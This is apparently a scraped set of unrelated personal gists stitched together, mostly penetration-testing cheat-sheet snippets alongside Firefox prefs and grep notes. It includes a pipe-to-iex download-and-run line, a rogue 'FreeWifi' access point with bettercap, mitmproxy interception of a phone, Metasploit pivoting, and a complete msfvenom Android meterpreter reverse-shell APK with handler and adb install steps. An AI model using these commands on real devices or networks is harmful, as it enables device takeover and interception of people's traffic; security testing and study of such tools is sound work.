castexyz

Z2lub2dpbm8=

castexyz

# Description: Boxstarter Script for Developer Machines
# 
# To run this script, you first have to install boxstarter using the following command (NOTE the "." below is required):
# 	. { iwr -useb http://boxstarter.org/bootstrapper.ps1 } | iex; get-boxstarter -Force
# Learn more: http://boxstarter.org/Learn/WebLauncher
#
# Run this BoxstarterDevFull.ps1 script by calling the following from **elevated** powershell:
#   example: Install-BoxstarterPackage -PackageName https://gist.githubusercontent.com/castexyz/3f2c2c7c368141db0b480edc82fb0f75/raw/f9633684d23b3d40352489e85647c75154ca12bb/BoxstarterDevFull.ps1

Update-ExecutionPolicy -Policy RemoteSigned

castexyz

/* override recipe: enable session restore ***/
user_pref("browser.startup.page", 3); // 0102
  // user_pref("browser.privatebrowsing.autostart", false); // 0110 required if you had it set as true
  // user_pref("places.history.enabled", true); // 0862 required if you had it set as false
  // user_pref("browser.sessionstore.privacy_level", 0); // 1003 optional [to restore cookies/formdata]
user_pref("privacy.clearOnShutdown.history", false); // 2803
  // user_pref("privacy.clearOnShutdown.cookies", false); // 2803 optional
  // user_pref("privacy.clearOnShutdown.formdata", false); // 2803 optional
user_pref("privacy.cpd.history", false); // 2804 to match when you use Ctrl-Shift-Del
  // user_pref("privacy.cpd.cookies", false); // 2804 optional

castexyz

sudo apt-get install haveged hostapd git util-linux procps iproute2 iw dnsmasq iptables bettercap
git clone https://github.com/oblique/create_ap
cd create_ap
sudo make install

sudo systemctl stop NetworkManager

Create AP (create_ap <wifi-interface> [<interface-with-internet>] [<access-point-name> [<passphrase>]])
sudo create_ap wlan1 eth0 FreeWifi

castexyz

2.	On the kali machine install/upgrade mitmproxy with “pip3 install mitmproxy” / “pip3 install –upgrade mitmproxy”
3.	On the kali machine launch mitmproxy with “mitmproxy” command
4.	On the mobile device configure ProxyDroid to use mitmproxy port (8080) and host
5.	On the mobile device open http://mitm.it/cert/pem in the browser and download 
6.	Install the downloaded certificate
7.	On the Kali launch Burp and setup the proxy in order to listen into localhost:8082
8.	Run mitmproxy with upstream option “mitmproxy --mode upstream:http://127.0.0.1:8082 --ssl-insecure”

castexyz

run autoroute -s 192.168.0.1/24 (inside meterpreter session)

OR

route add 192.168.0.0 255.255.255.0 1
use auxiliary/server/socks4a
set SRVHOST 0.0.0.0
set srvport 1080
exploit -y

castexyz

#!/bin/sh
#http://www.thegeekstuff.com/2011/01/advanced-regular-expressions-in-grep-command-with-10-examples-%E2%80%93-part-ii/


# GENERAL
# print lines begining with range of letters
grep ^[A-D] table.txt


# REGEX

castexyz

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.6 LPORT=4444 -o msf.apk

msfconsole -qx "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set ExitOnSession false; exploit -j -z"

adb install msf.apk
adb shell am start -n com.metasploit.stage/.MainActivity

castexyz

Windows
find string ignoring case (/i) on current folder and subfolders (/S) with specific file extension
findstr /i "<string>" *.<file extension>

dir /s /b >all-files.txt
findstr "\.db \.sqlitedb \.sqlite3 \.sqlite \.storedata \.store \.sql \.kcr" all-files.txt > all-databases.txt

castexyz

• Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
  • Starting a session
    • adb forward tcp:31415 tcp:31415
    • drozer console connect
    • drozer console connect --server <ip>
  • List modules
    • ls
    • ls activity
  • Retrieving package information
• run app.package.list -f